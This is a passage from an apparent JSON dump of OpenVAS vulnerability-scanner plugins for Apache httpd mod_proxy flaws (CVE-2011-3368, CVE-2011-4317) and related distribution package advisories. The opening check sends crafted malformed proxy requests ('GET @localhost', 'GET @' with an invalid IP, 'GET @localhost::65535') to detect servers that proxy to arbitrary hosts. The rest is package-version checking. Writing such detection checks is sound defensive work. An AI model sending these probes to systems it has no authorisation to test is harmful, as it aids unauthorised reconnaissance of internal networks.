value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! loc = get_app_location( cpe:CPE, port:port ) )\n exit( 0 ); # To have a reference to the detection VT\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || \"Apache\" >!< banner )\n exit( 0 );\n\nreq = http_get( item:\"/\", port:port );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\nif( ! res || res =~ \"^HTTP/1\\.[01] 50[23]\" || ( res =~ \"^HTTP/1\\.[01] 200\" && \"Bad Gateway\" >< res ) )\n exit( 0 );\n\nreq = 'GET @localhost HTTP/1.0\\r\\n\\r\\n';\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( ereg( pattern:\"^HTTP/1\\.[01] 400\", string:res ) )\n exit( 99 ); # 400 means not vulnerable\n\nip3 = \"5555.6666.7777.8888\";\nreq = \"GET @\" + ip3 + ' HTTP/1.0\\r\\n\\r\\n';\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( ereg( pattern:\"^HTTP/1\\.[01] 200\", string:res ) && \"Bad Gateway\" >< res ||\n ereg( pattern:\"^HTTP/1\\.[01] 502\", string:res ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\n# CVE-2011-4317\nreq = 'GET @localhost::65535 HTTP/1.0\\r\\n\\r\\n';\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( ereg( pattern:\"^HTTP/1\\.[01] 503\", string:res ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-03-17T23:03:53", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2011-9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120513", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120513\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 11:27:36 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2011-9)\");\n script_tag(name:\"insight\", value:\"It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368 )It was discovered that mod_proxy_ajp incorrectly returned an Internal Server Error response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348 )\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3348\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-13T00:00:00", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2012:003 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2011-3368"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2012:003 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:003\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831523\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-13 10:49:33 +0530 (Fri, 13 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"MDVSA\", value:\"2012:003\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-4317\");\n script_name(\"Mandriva Update for apache MDVSA-2012:003 (apache)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2|2010\\.1)\");\n script_tag(name:\"affected\", value:\"apache on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name : \"insight\", value : \"Multiple vulnerabilities has been found and corrected in apache:\n Integer overflow in the ap_pregsub function in server/util.c in the\n Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21,\n when the mod_setenvif module is enabled, allows local users to gain\n privileges via a .htaccess file with a crafted SetEnvIf directive,\n in conjunction with a crafted HTTP request header, leading to a\n heap-based buffer overflow (CVE-2011-3607).\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n 1179239 patch is in place, does not properly interact with use of (1)\n RewriteRule and (2) ProxyPassMatch pattern matches for configuration\n of a reverse proxy, which allows remote attackers to send requests\n to intranet servers via a malformed URI containing an \\@ (at sign)\n character and a : (colon) character in invalid positions. NOTE: this\n vulnerability exists because of an incomplete fix for CVE-2011-3368\n (CVE-2011-4317).\n\n The updated packages have been patched to correct these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:29", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1259-1", "cvss3": {}, "published": "2011-11-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for apache2 USN-1259-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-1176", "CVE-2011-3348"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840798", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1259_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for apache2 USN-1259-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1259-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840798\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:55:23 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"USN\", value:\"1259-1\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3348\", \"CVE-2011-1176\");\n script_name(\"Ubuntu Update for apache2 USN-1259-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1259-1\");\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that the mod_proxy 